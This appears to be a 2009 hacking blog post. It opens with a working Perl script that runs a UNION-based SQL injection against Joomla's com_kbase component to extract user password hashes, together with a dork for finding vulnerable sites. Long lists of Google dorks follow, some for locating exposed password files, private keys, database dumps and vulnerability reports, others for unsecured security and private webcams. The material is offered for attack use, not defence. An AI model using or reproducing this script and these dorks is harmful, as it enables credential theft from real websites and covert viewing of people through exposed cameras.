Saturday, 07 February 2009

SQL Injection Script

#Joomla Remote SQL Injection Script By XShimeX
#Dork: inurl:index.php?option=com_kbase
#Contact: slientro[AT]yahoo.com.my (Replace [AT] with @)

use IO::Socket::INET;
use LWP::UserAgent;
print "[*] Joomla Remote SQL Injection Script By XShimeX\n";
print "[*] Dork: inurl:index.php?option=com_kbase\n";
print "[*] Example: http://target.com/joomla\n";
print "[*] Enter The Target: ";
chomp (my $target=<STDIN>);

$t = LWP::UserAgent->new() or die "Browser Failed\n";
$t->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

if (!$target){
print "[*] Please enter the target ;p\n";
system('exit');
}else {
$password = "password";
$table = "jos_users";

print "[*] Start attack for ".$target." !\n";
$inject = $target ."/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(".$password."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$table."--";
$request = $t->request(HTTP::Request->new(GET=>$inject));
$answer = $request->content;

if ($answer =~/([0-9a-fA-F]{32})/){
print "[*] Password Hash : $1\n";
print "[*] Attack success ;p";
}else{
print "[*] Attack Failed\n";
}
}

inurl:Index of

inurl:index.of.password
Directory listing contains password file(s)?
intitle:"Index of" service.pwd
Directory listing contains service.pwd file(s)
intitle:"Index of" view-source
Directory listing contains view-source file(s)
intitle:"Index of" admin
Directory listing contains administrative files or directories
intitle:"Index of" .htpasswd
Directory listing contains .htpasswd file!
intitle:"Index of" log.txt
Directory listing contains log text files
intitle:"Index of" stats.html
Directory listing contains stats.html which may contain useful web server statistics
"access denied for user" "using password"
Web page contains error message which might provide useful application information
"A syntax error has occurred" filetype:ihtml
Web page contains error message which might provide useful application information
"ORA-00921: unexpected end of SQL command"
Web page contains error message which might provide useful application information
inurl:passlist.txt
The passlist.txt file may contain user passwords
"Index of /backup"
Directory may contain sensitive backup files
intitle:"Index of" .bash_history
Directory listing contains bash history information
intitle:"Index of" index.html.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" index.php.bak
Directory listing contains backup index file (index.php.bak)
intitle:"Index of" guestbook.cgi
Directory listing contains guestbook.cgi file(s)
intitle:"Test Page for Apache"
Default test page for Apache
intitle:index.of.etc
Directory listing of /etc ?
filetype:xls username password
XLS spreadsheet containing usernames and passwords?
"This file was generated by Nessus"
Nessus report!
intitle:"Index of" secring.bak
Secret key file
intitle:"Terminal Services Web Connection"
Access terminal services!
intitle:"Remote Desktop Web Connection"
Access Remote Desktop!
intitle:"Index of" access_log
Directory listing contains access_log file which may store sensitive information
intitle:"Index of" finance.xls
Directory listing contains finance.xls which may contain sensitive information
intitle:"Usage Statistics for"
Statistical information may contain sensitive data
intitle:"Index of" WSFTP.LOG
WSFTP.LOG file contains information about FTP transactions
intitle:"Index of" ws_ftp.ini
The ws_ftp.ini file may contain usernames and passwords of FTP users
"not for distribution" confidential
URL may contain confidential or sensitive information
"phpMyAdmin" "running on" inurl:"main.php"
phpMyAdmin allows remote mysql database administration
"#mysql dump" filetype:sql
mysql database dumps
"This summary was generated by wwwstat"
Database statistics
"Host Vulnerability Summary Report"
Vulnerability report!
"Network Vulnerability Assessment Report"
Vulnerability report!
inurl:php.ini filetype:ini
The php.ini file may contain sensitive PHP environment details.
BEGIN (CERTIFICATE|DSA|RSA) filetype:key
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
Private key(s)!
intitle:"Index of" passwd passwd.bak
passwd file!
intitle:"Index of" master.passwd
master.passwd file!
intitle:"Index of" pwd.db
pwd.db file may contain password information
intitle:"Index of..etc" passwd
passwd file!
filetype:cfg ks intext:rootpw -sample -test -howto
This file may contain the root password (encrypted)
intitle:"index.of.personal"
Directory may contain sensitive information
intitle:"Index of" login.jsp
The login.jsp file may contain database username or password information
intitle:"Index of" logfile
Directory may contain sensitive log files
filetype:php inurl:"viewfile" -"index.php" -"idfil
File may contain PHP source code
allinurl:intranet admin
Page may contain sensitive information
"supplied argument is not a valid MySQL result resource"
mysql error message may reveal sensitive information
"Error Diagnostic Information" intitle:"Error Occurred While"
Error message may reveal sensitive information
HTTP_USER_AGENT=Googlebot
Page may contain sensitive environment details

Google hack

Search GOOGLE:

allintitle: "Network Camera NetworkCamera"
Network cameras
intitle:Axis 2400 video server
Mostly security cameras, car parks, colleges, clubs, bars, etc.
intitle:axis intitle:"video server"
Mostly security cameras, car parks, colleges, bars, ski slopes etc.
intitle:"EvoCam" inurl:"webcam.html"
Mostly European security cameras
intitle:"Live NetSnap Cam-Server feed"
Network cameras, private and non private web cameras
intitle:"Live View / - AXIS"
Mostly security cameras, car parks, colleges etc.
intitle:"LiveView / - AXIS" | inurl:view/view.shtml
Mostly security cameras, car parks, colleges etc.
intitle:liveapplet
Mostly security cameras, car parks, colleges, clubs, bars etc.
intitle:snc-cs3 inurl:home/
Mostly security cameras, swimming pools and more etc.
intitle:"snc-rz30 home"
Mostly security cameras, shops, car parks
intitle:snc-z20 inurl:home/
Mostly security cameras, swimming pools and more etc.
intitle:"WJ-NT104 Main"
Mostly security cameras, shops, car parks
inurl:LvAppl intitle:liveapplet
Mostly security cameras, car parks, colleges etc.
inurl:indexFrame.shtml "Axis Video Server"
Mostly security cameras, car parks, colleges etc.
inurl:lvappl
A huge list of webcams around the world, mostly security cameras, car parks, colleges etc.
inurl:axis-cgi/jpg
Mostly security cameras
inurl:indexFrame.shtml Axis
Mostly security cameras, car parks, colleges etc.
inurl:"MultiCameraFrame?Mode=Motion"
Mostly security cameras, pet shops, colleges etc.
inurl:/view.shtml
Mostly security cameras, car parks, colleges etc.
inurl:/view/index.shtml
Mostly security cameras, airports, car parks, back gardens, traffic cams etc.
inurl:viewerframe?mode=
Network cameras, mostly private webcams etc.
inurl:"viewerframe?mode=motion"
Network cameras
inurl:ViewerFrame?Mode=Refresh
Mostly security cameras, parks, bird tables etc.

Other searches:

control/userimage.html
liveapplet
inurl:indexframe.shtml
inurl:"view/index.shtml"
inurl:"view/indexFrame.shtml"
inurl:view/view.shtml
inurl:/view/view.shtml?videos=
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Motion
inurl:ViewerFrame?Mode=Refresh
site:.viewnetcam.com -www.viewnetcam.com
/view/index.shtml

InTitle:

intitle:"live view" intitle:axis
intitle:"EvoCam" inurl:"webcam.html"
intitle:"i-Catcher Console - Web Monitor"
intitle:"Live NetSnap Cam-Server feed"
allintitle:liveapplet
intitle:liveapplet
intitle:"netcam live image"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"

InURL:

inurl:axis-cgi/jpg
inurl:indexFrame.shtml Axis
inurl:indexFrame.shtml "Axis Video Server"
inurl:lvappl live webcams
inurl:LvAppl intitle:liveapplet
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view:shtml
inurl:/view/index.shtml
inurl:view/indexframe.shtml
inurl:view/view.shtml
viewerframe?mode=
inurl:"viewerframe?mode=motion"
inurl:ViewerFrame?Mode=Refresh

Combined searches:

intitle:"live view" intitle:axis (two searches in one query)
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS" , inurl:view/view.shtml
intitle:start inurl:cgistart